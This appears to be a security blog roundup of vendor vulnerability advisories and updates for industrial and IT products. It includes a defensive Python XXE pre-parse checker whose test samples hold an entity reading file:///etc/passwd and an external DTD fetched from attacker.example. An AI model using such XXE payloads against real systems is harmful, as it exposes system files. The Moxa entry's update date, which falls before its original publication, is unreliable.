For Part 2 we have 16 additional vendor disclosures from Omron (2), Phoenix Contact (2), Schneider (9), Splunk (2), and Zyxel. We also have 9 vendor updates from FortiGuard (4), HP (2), Mitsubishi, Moxa, and Schneider. Part 3, with Siemens updates, researcher reports, and exploits, will come out later this week.
Omron Advisories
Omron published an advisory that describes a path traversal vulnerability in their NJ/NX-series Machine Automation Controllers. Omron has a new version that mitigates the vulnerability.
Omron published an advisory that describes an improper restriction of an XML external entity reference vulnerability in their NB-series NB-Designer. The vulnerability was reported by Michael Heinzl. Omron has a new version that mitigates the vulnerability.
Phoenix Contact Advisories
Phoenix Contact published an advisory that describes an incorrect permission assignment for critical resource vulnerability in their CHARX-SEC3xxx Charge controllers. The vulnerability was reported by Tien Phan and Richard Jaletzki. Phoenix Contact has a new version that mitigates the vulnerability.
Phoenix Contact published an advisory that discusses an observable discrepancy vulnerability (with publicly available exploit) in their ESL Stick USB-A. This is a third-party (Yubico) vulnerability reported (with PoC) by NinjaLab.io. A new version of the dongle firmware is available.
Schneider Advisories
Schneider published an advisory that describes an incorrect calculation of buffer size vulnerability in their Modicon M580 PLCs, BMENOR2200H and EVLink Pro AC. Schneider has new versions that mitigate the vulnerability.
Schneider published an advisory that describes an improper enforcement of message integrity in a communication channel vulnerability in their Pro-face GP-Pro EX and Remote HMI. The vulnerability was reported by Haichuan Xu of Georgia Institute of Technology. Schneider provides generic mitigation measures.
Schneider published an advisory that discusses an out-of-bounds write vulnerability in their Modicon M580 and Modicon Quantum communications modules. This is a third-party (WindRiver) vulnerability. Schneider has a new version for one of the affected products.
Schneider published an advisory that describes an improper restriction of XML external entity reference in their Web Designer for Modicon Communication Modules. The vulnerability was reported by Jin Huang of ADLab of Venustech. Schneider provides generic mitigation measures.
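Both the Omron NB-Designer and the Schneider Web Designer advisories above are XML external entity (XXE) issues in engineering tools that open project files. A practical pre-parse check, added here as an example and not code from either vendor or advisory, is to walk the document's DOCTYPE with Python's stdlib expat parser, record any external DTD or SYSTEM/PUBLIC entity declaration, and refuse to resolve any external reference. The sample project files are constructed for the example.

```python
import xml.parsers.expat


def find_external_references(xml_text: str) -> list[str]:
    """Return external references declared in an XML document.

    Uses only the stdlib expat parser and never fetches anything: every
    external entity reference is refused, and external DTD / SYSTEM /
    PUBLIC entity declarations are recorded so the caller can reject the
    file before handing it to the real (possibly XXE-prone) parser.
    """
    found: list[str] = []
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # <!DOCTYPE x SYSTEM "..."> points at an external DTD
        if system_id is not None or public_id is not None:
            found.append(f"doctype:{system_id or public_id}")

    def on_entity_decl(name, is_param, value, base, system_id, public_id, notation):
        # An external entity has no inline value; it carries a system/public id
        if system_id is not None or public_id is not None:
            found.append(f"entity:{name}={system_id or public_id}")

    def on_external_ref(context, base, system_id, public_id):
        # Returning 0 aborts the parse instead of resolving the reference
        return 0

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    try:
        parser.Parse(xml_text, True)
    except xml.parsers.expat.ExpatError:
        # Reached when on_external_ref aborts; declarations were already recorded
        pass
    return found


def is_safe_to_parse(xml_text: str) -> bool:
    """True when the document declares nothing that would be fetched from outside."""
    return not find_external_references(xml_text)


# Constructed sample project files (not taken from any vendor advisory)
XXE_SAMPLE = """<?xml version="1.0"?>
<!DOCTYPE project [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<project><name>&xxe;</name></project>"""

EXTERNAL_DTD_SAMPLE = """<?xml version="1.0"?>
<!DOCTYPE project SYSTEM "http://attacker.example/project.dtd">
<project><name>demo</name></project>"""

BENIGN_SAMPLE = """<?xml version="1.0"?>
<!DOCTYPE project [
  <!ENTITY vendor "Example Co">
]>
<project><name>&vendor;</name></project>"""


if __name__ == "__main__":
    for label, doc in (("xxe", XXE_SAMPLE), ("ext-dtd", EXTERNAL_DTD_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, "safe" if is_safe_to_parse(doc) else "REJECT", find_external_references(doc))
```

The check is deliberately conservative: an internal entity with an inline value (the `vendor` declaration) passes, while anything that names a URI is reported, whether or not the document actually references it. Run it on a project file before loading it into a tool whose parser has not been confirmed to disable external entity resolution.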
Schneider published an advisory that describes an exposure of sensitive information to an unauthorized actor vulnerability in their Web Server on Modicon M340. Schneider has a new version for one of the affected products that mitigates the vulnerability.
Schneider published an advisory that describes a deserialization of untrusted data vulnerability in their RemoteConnect and SCADAPack x70 Utilities. Schneider provides generic mitigation measures.
Schneider published an advisory that discusses an uncontrolled search path element vulnerability in multiple Schneider products using FlexNet Publisher. This is a third-party (Revenera) vulnerability. Schneider has new versions that mitigate the vulnerability.
Schneider published an advisory that describes two vulnerabilities in their PowerLogic HDPM6000 High-Density Metering System. Schneider has a new version that mitigates the vulnerabilities.
The two reported vulnerabilities are:
Authorization bypass through user-controlled key - CVE-2024-10497, and
Improper restriction of operation within the bounds of a memory buffer - CVE-2024-10498
Schneider published an advisory that describes an improper restriction of operations within the bounds of a memory buffer vulnerability in their EcoStruxure Power Build Rapsody. The vulnerability was reported by Michael Heinzl. Schneider has a new version that mitigates the vulnerability.
NOTE: Heinzl actually published reports of five vulnerabilities that Schneider has lumped into this single CVE; Heinzl reports that: “Vendor states that all five reported vulnerabilities have the same root cause, and therefore only assign one CVE.” Those reports include an interesting timeline of the discussion with Schneider. The reported vulnerabilities are:
Heap-based buffer overflow (2) - AWE-2025-006 and AWE-2025-005,
Stack-based buffer overflow - AWE-2025-004, and
File parsing memory corruption (2) - AWE-2025-003 and AWE-2025-002
Splunk Advisories
Splunk published an advisory that describes a regular expression denial-of-service vulnerability in their Splunk Supporting Add-on for Active Directory (SA-ldapsearch). Splunk has a new version that mitigates the vulnerability.
Splunk published an advisory that describes an improper privilege management vulnerability in their Splunk App for SOAR. Splunk has a new version that mitigates the vulnerability.
Zyxel Advisory
Zyxel published an advisory that describes an improper privilege management vulnerability in their APs and security router devices. The vulnerability was reported by Alessandro Sgreccia from HackerHood. Zyxel has new versions that mitigate the vulnerability.
FortiGuard Updates
FortiGuard published an update for their buffer overflow advisory that was originally published on May 14th, 2024, and most recently updated on June 19th, 2024. The new information includes adding IPS package info.
FortiGuard published an update for their HTTP2 Rapid Reset advisory that was originally published on February 8th, 2024, and most recently updated on June 19th, 2024. The new information includes adding IPS package info.
FortiGuard published an update for their out-of-bounds write advisory that was originally published on February 8th, 2024, and most recently updated on February 23rd, 2025. The new information includes adding IPS package info.
FortiGuard published an update for their path traversal advisory that was originally published on October 10th, 2023. The new information includes adding FortiAnalyzer-BigData.
HP Updates
HP published an update for their Intel 2024.3 IPU advisory that was originally published on October 18th, 2024. The new information includes updating version and SoftPaq information for Business Notebooks, Business Desktops, Point-of-Sales Systems, Workstations, and Thin Clients.
HP published an update for their Intel 2024.3 IPU advisory that was originally published on October 17th, 2024. The new information includes updating version and SoftPaq information for Business Notebooks, Business Desktops, Point-of-Sales Systems, Workstations, and Thin Clients.
Mitsubishi Update
Mitsubishi published an update for their GENESIS64 and MC Works64 advisory that was originally published on November 28th, 2024. The new information includes updating "Overview," "Description," and "Mitigations / Workarounds."
Moxa Update
Moxa published an update for their Cellular Routers advisory that was originally published on January 15th, 2025, and most recently updated on January 10th, 2025. The new information includes updating the solution for the NAT-102 Series.
Schneider Update
Schneider published an update for their BadAlloc advisory that was originally published on November 9th, 2021, and most recently updated on November 12th, 2024. The new information includes announcing that remediation is available for Modicon X80 module, part number BMENOS0300.